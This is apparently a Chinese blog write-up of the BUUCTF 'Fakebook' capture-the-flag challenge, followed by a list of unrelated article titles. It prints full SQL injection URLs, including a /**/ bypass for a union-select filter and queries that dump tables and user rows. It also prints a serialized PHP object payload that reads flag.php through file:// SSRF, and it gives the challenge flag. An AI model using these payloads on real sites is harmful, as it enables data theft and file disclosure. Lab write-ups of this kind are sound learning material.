当前位置: 首页 > web >正文

BUUCTF——Fakebook 1

web 2025/5/1 6:31:25

BUUCTF——Fakebook 1

进入靶场

在这里插入图片描述

有两个功能点

login

在这里插入图片描述

测试了一下弱口令和万能密码

没啥用

join

在这里插入图片描述

增加个用户试试

在这里插入图片描述

居然创建成功了

在这里插入图片描述

我还想着admin越权

扫目录发现一个robots.txt

在robots.txt里发现一个user.php.bak的url

拼接下载

<?phpclass UserInfo
{public $name = "";public $age = 0;public $blog = "";public function __construct($name, $age, $blog){$this->name = $name;$this->age = (int)$age;$this->blog = $blog;}function get($url){$ch = curl_init();curl_setopt($ch, CURLOPT_URL, $url);curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);$output = curl_exec($ch);$httpCode = curl_getinfo($ch, CURLINFO_HTTP_CODE);if($httpCode == 404) {return 404;}curl_close($ch);return $output;}public function getBlogContents (){return $this->get($this->blog);}public function isValidBlog (){$blog = $this->blog;return preg_match("/^(((http(s?))\:\/\/)?)([0-9a-zA-Z\-]+\.)+[a-zA-Z]{2,6}(\:[0-9]+)?(\/\S*)?$/i", $blog);}}

点击进入admin

在这里插入图片描述

发现一个no传参

尝试sql注入

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=1 and 1=1--+

在这里插入图片描述

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=1 and 1=2--+

在这里插入图片描述

看来有注入点

直接上sqlmap神器看看

很遗憾没梭出来

在这里插入图片描述

还是手注吧

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=1 order by 5--+

在这里插入图片描述

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union select database(),2,3,4--+

在这里插入图片描述

坏了,被过滤了

得想想办法绕过

试了好多方法都绕不过去

看了一下其他师傅的文章

原来是过滤了union select

用/**/绕过

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1%20union/**/select%20database(),2,3,4--+

在这里插入图片描述

在第二列

爆库

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1%20union/**/select%201,database(),3,4--+

在这里插入图片描述

爆表

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union/**/select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema=database()

在这里插入图片描述

继续

爆列

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union/**/select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema=database() and table_name='users'

在这里插入图片描述

爆字段

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1 union/**/select 1,group_concat(no,username,passwd,data),3,4 from users

在这里插入图片描述

根据之前下载的代码发现可能存在ssrf漏洞

http://91559d98-b930-4ef0-845d-6ebfd675414e.node5.buuoj.cn:81/view.php?no=-1%20union/**/select%201,2,3,%27O:8:%22UserInfo%22:3:{s:4:%22name%22;s:3:%22123%22;s:3:%22age%22;i:123;s:4:%22blog%22;s:29:%22file:///var/www/html/flag.php%22;}%27

查看源代码

拿到flag

在这里插入图片描述

在这里插入图片描述

flag{c016e06b-12fb-4b33-80f9-84888834e1bc}

下播!

在这里插入图片描述

http://www.xdnf.cn/news/3196.html

相关文章:

  • UE 材质 条纹循环发光
  • Android compileSdkVersion、minSdkVersion、targetSdkVersion的关系以及和Unity的关系
  • Qwen3本地化部署,准备工作:SGLang
  • K8S - 从单机到集群 - 核心对象与实战解析
  • 同时启动俩个tomcat压缩版
  • C# 在VS2022中开发常用设置
  • Python 爬取微店商品列表接口(item_search)的实战指南
  • 如何在Windows上实现MacOS中的open命令
  • 网工_ICMP协议
  • Linux-04-用户管理命令
  • Java List分页工具
  • 排序算法——选择排序
  • 微格式:为Web内容赋予语义的力量
  • 【Linux 网络】网络工具ifconfig和iproute/iproute2工具详解
  • 端到端观测分析:从前端负载均衡到后端服务
  • 进程、线程、进程间通信Unix Domain Sockets (UDS)
  • 《操作系统真象还原》第十一章——用户进程
  • Spring 框架中的常见注解讲解
  • Qt窗口关闭特效:自底而上逐渐消失
  • google colab设置python环境为python3.7
  • 提高程序灵活性和效率的利器:Natasha动态编译库【.Net】
  • 【学习笔记】Shell编程--Bash变量
  • HBuider中Uniapp去除顶部导航栏-小程序、H5、APP适用
  • 线上婚恋相亲小程序源码介绍
  • Learning vtkjs之ImageMarchingSquares
  • 国内免费连接claude-3-7大模型操作教程
  • 数据库系统综合应用与深度实践指南
  • VINS-FUSION:配置参数说明与配置自己的参数
  • 【XR】MR芯片 和 VR芯片之争
  • Linux:文件操作